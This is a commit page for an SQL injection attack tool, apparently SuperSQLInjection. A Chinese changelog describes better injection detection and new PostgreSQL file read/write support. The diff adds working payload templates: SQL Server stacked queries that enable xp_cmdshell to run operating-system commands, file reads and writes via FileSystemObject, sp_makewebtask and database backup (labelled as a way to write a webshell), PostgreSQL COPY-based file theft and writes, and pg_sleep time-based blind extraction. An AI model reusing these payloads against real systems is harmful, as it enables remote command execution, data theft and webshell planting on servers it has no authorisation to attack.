shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update20181221

Browse Source 
20181221 V1.0 正式版---
修复盲注关键字判断机制,自动识别时,关键字相同且状态码相同才认为是true页面,解决在部分情况下可能出现错误500页面也存在同样关键字的问题。
修改SQLServer查询列时,使用char函数方式,避免单引号被过滤导致无法获取列名的问题。
修复SQLServer 执行命令,读写文件时,可能由于语句报错而导致读写文件失败的问题,优化提高成功率。
修复betweent and绕过时,将16进制字符替换了,导致语句错误而无法获取数据的问题。
修复自动识别在某些情况下跳过了错误显示注入检查。
修复Union注入重复发包判断列情况。
修复自动识别注入,在部分情况下无法正确判断数据库类型的问题。
修改爆出注入配置文件,降低漏报。
优化自动识别注入,如果程序判断支持盲注,会自动尝试使用order by去判断页面列数,提高Union注入检查的速度。
新增支持注入PostgreSQL文件读写功能。
This commit is contained in:
shack2
2018-12-21 16:08:29 +08:00
parent 81f084e9ca
commit b18f7b73f9
14 changed files with 943 additions and 326 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
SuperSQLInjection/payload/DBPayload.cs Normal file
View File

@@ -0,0 +1,12 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace SuperSQLInjection.payload
{
class DBPayload
{
}
}

12
SuperSQLInjection/payload/MySQL.cs
View File

@@ -28,8 +28,6 @@ namespace SuperSQLInjection.payload
//获取列名称
public static String column_value = "(select column_name from information_schema.columns where table_schema='{dbname}' and table_name='{table}' limit {index},1)";
public static String bool_length = "char_length({data})";
public static String bool_value = "ascii(mid({data},{index},1))";
public static String mid_value = "(mid({data},{index},1))";
@@ -370,6 +368,16 @@ namespace SuperSQLInjection.payload
String data = data_value_orderBy.Replace("{columns}", column).Replace("{orderby}", orderBy).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
return data;
}
/// <summary>
/// 反射条调用,加载显示支持的文件操作
/// </summary>
/// <returns></returns>
public static List<String> getShowCanDoFile() {
List<String> list = new List<String>();
list.Add("MySQL Load_File读文件");
list.Add("MySQL Union写文件");
return list;
}

87
SuperSQLInjection/payload/PostgreSQL.cs
View File

@@ -11,7 +11,7 @@ namespace SuperSQLInjection.payload
public static String path = "config/vers/postgresql.txt";
public static List<String> vers = FileTool.readFileToList(path);
public static String char_length = "(select char_length({data}))";
public static String char_length = "(char_length({data}))";
//数据库数量
public static String dbs_count = "(select count(distinct(schemaname)) from pg_tables)";
@@ -34,6 +34,8 @@ namespace SuperSQLInjection.payload
public static String bool_value = "ascii(substring(cast({data} as text),{index},1))";
public static String bool_data = " {data}>{len}";
public static String substr_one_value = "(substring(cast({data} as text),{index},1))";
//获取数据库数量bool方式
@@ -55,6 +57,9 @@ namespace SuperSQLInjection.payload
//bool方式获取值
public static String ver_value = " "+ bool_value + ">{len}";
//bool方式获取值
public static String char_length_val = " " + char_length + ">{len}";
//bool方式获取值
public static String bool_ord_value = " " + substr_one_value + ">{len}";
@@ -80,6 +85,24 @@ namespace SuperSQLInjection.payload
public static String substr_value = "(select substr({data},{start},{len}))";
public static String readFile = " 1=1;drop table if exists ssqlinjection;create table ssqlinjection(data text);copy ssqlinjection from '{path}';--";
public static String createTable = " 1=1;drop table if exists ssqlinjection;create table ssqlinjection (data text);--";
public static String insertLineValue = " 1=1;insert into ssqlinjection(data) values ('{content}');--";
public static String writeFile = " 1=1;copy ssqlinjection(data) to '{path}';--";
public static String drop_table = " 1=1;drop table if exists ssqlinjection;--";
public static String file_content = "(select data from ssqlinjection)";
public static String file_content_Count = "(select count(1) from ssqlinjection)";
public static String file_content_data = "(select data from ssqlinjection offset {index} limit 1)";
public static String getBoolDataBySleep(String data,int maxTime)
{
return " 1=(case when ((" + data + ")>{len}) then (select 1 from pg_sleep(" + maxTime + ")) else 1 end)";
@@ -90,6 +113,8 @@ namespace SuperSQLInjection.payload
return " 1=(case when ((" + data + ")) then (select 1 from pg_sleep(" + maxTime + ")) else 1 end)";
}
/// <summary>
///
@@ -108,46 +133,17 @@ namespace SuperSQLInjection.payload
return error_value.Replace("{data}", d);
}
public static String creatMySQLReadFileByUnion(int columnsLen, int showIndex,String fill,String data)
public static String getReadFilePayload(String path)
{
StringBuilder sb = new StringBuilder();
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append(concatMySQLColumn(data) + ",");
}
else
{
sb.Append(fill+",");
}
}
return sb.Remove(sb.Length - 1, 1).ToString();
return readFile.Replace("{path}", path);
}
public static String creatMySQLWriteFileByUnion(int columnsLen, int dataIndex,String fill, String path,String content)
public static String getInsertLineValue(String content)
{
StringBuilder sb = new StringBuilder(" 1=1 union select ");
for (int i = 1; i <= columnsLen; i++)
{
if (i == dataIndex)
{
sb.Append(Tools.strToHex(content,"UTF-8")+",");
}
else
{
sb.Append(fill+",");
}
}
sb.Remove(sb.Length - 1, 1);
sb.Append(" into dumpfile '"+path+"'");
return sb.ToString();
return insertLineValue.Replace("{content}", content);
}
public static String getWriteFilePayload(String path)
{
return writeFile.Replace("{path}", path);
}
public static String getUnionDataValue(int columnsLen, int showIndex, String dataPayLoad, String dbname, String table, String index)
{
@@ -167,6 +163,9 @@ namespace SuperSQLInjection.payload
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
{
StringBuilder sb = new StringBuilder();
@@ -208,7 +207,17 @@ namespace SuperSQLInjection.payload
return data;
}
/// <summary>
/// 反射条调用,加载显示支持的文件操作
/// </summary>
/// <returns></returns>
public static List<String> getShowCanDoFile()
{
List<String> list = new List<String>();
list.Add("PostgreSQL Copy写文件");
list.Add("PostgreSQL Copy读文件");
return list;
}
}
}

25
SuperSQLInjection/payload/SQLServer.cs
View File

@@ -69,17 +69,23 @@ namespace SuperSQLInjection.payload
//cmd
public static String createTable = " 1=1;drop table ssqlinjection;create table ssqlinjection(id int primary key identity,data varchar(8000));exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd;select 1 where 1=1 ";
public static String createTableAndExecCmd = " 1=1;create table ssqlinjection(id int primary key identity,data varchar(8000));exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd;select 1 where 1=1 ";
public static String cmdData = "cast((select top 1 data from ssqlinjection where id={index}) as varchar(8000))";
public static String cmdDataCount = "(select (select count(*) from ssqlinjection))";
public static String dropTable = " 1=1;drop table ssqlinjection;select 1 where 1=1 ";
public static String dropWriteFileBackUpTableAndDropDB = " 1=1;drop table [ssqlinjection]..[data];drop database ssqlinjection;select 1 where 1=1 ";
public static String createWriteFileBackUpTable = " 1=1;create table [ssqlinjection]..[data] (content image);select 1 where 1=1 ";
public static String createWriteFileBackUpDB = " 1=1;create database ssqlinjection;select 1 where 1=1 ";
//文件读写
public static String witeFileByFileSystemObject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);set @data={data};declare @path varchar(4000);set @path={path};exec [master]..[sp_oacreate] 'scripting.fileSystemObject',@object out;exec [master]..[sp_oamethod] @object,'createtextfile',@file output,@path;exec [master]..[sp_oamethod] @file,'write',null,@data;exec [master]..[sp_oamethod] @file,'close',null;select 1 where 1=1 ";
public static String witeFileBySP_MakeWebTask = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;declare @d varchar(8000);set @d={data};declare @p varchar(4000);set @p={path};exec sp_makewebtask @p, @d;select 1 where 1=1 ";
public static String witeFileByBackDataBase = " 1=1;drop database ssqlinjection;create database ssqlinjection;drop table [ssqlinjection]..[data];create table [ssqlinjection]..[data] (content image);insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;select 1 where 1=1 ";
public static String readFileByFileSystemobject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';drop table ssqlinjection;create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);select 1 where 1=1 ";
public static String witeFileByBackDataBase = " 1=1;insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;select 1 where 1=1 ";
public static String readFileByFileSystemobject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);select 1 where 1=1 ";
//读文件的的payload
public static String file_content = "(select data from ssqlinjection)";
@@ -259,5 +265,18 @@ namespace SuperSQLInjection.payload
return payload;
}
/// <summary>
/// 反射条调用,加载显示支持的文件操作
/// </summary>
/// <returns></returns>
public static List<String> getShowCanDoFile()
{
List<String> list = new List<String>();
list.Add("SQLServer FileSystemObject写文件");
list.Add("SQLServer Sp_MakeWebTask写文件");
list.Add("SQLServer 备份写WebShell(有多余数据)");
list.Add("SQLServer FileSystemObject读文件");
return list;
}
}
}